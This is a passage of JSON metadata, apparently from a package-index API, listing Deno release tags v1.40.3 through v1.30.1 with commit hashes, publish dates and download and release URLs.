.40.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.3/manifests"},{"name":"v1.40.2","sha":"9a55a72cf195b2d5cee1e8598c7d28e4b1e8013a","kind":"commit","published_at":"2024-01-26T16:36:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.2/manifests"},{"name":"v1.40.1","sha":"b003ecec64782ebe3aa7e5b17728df2e6a6e2e39","kind":"commit","published_at":"2024-01-25T15:22:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.1/manifests"},{"name":"v1.40.0","sha":"9e575a286269c38c1af0a918a2a4ea4639a3004b","kind":"commit","published_at":"2024-01-25T02:48:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.40.0/manifests"},{"name":"v1.39.4","sha":"be4d0b7ad306312b0c01e1abc345e54b4e589ab6","kind":"commit","published_at":"2024-01-13T23:52:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.4/manifests"},{"name":"v1.39.3","sha":"aa23ccd1ae3b0c188336c0fd1d84deaed5fe13af","kind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/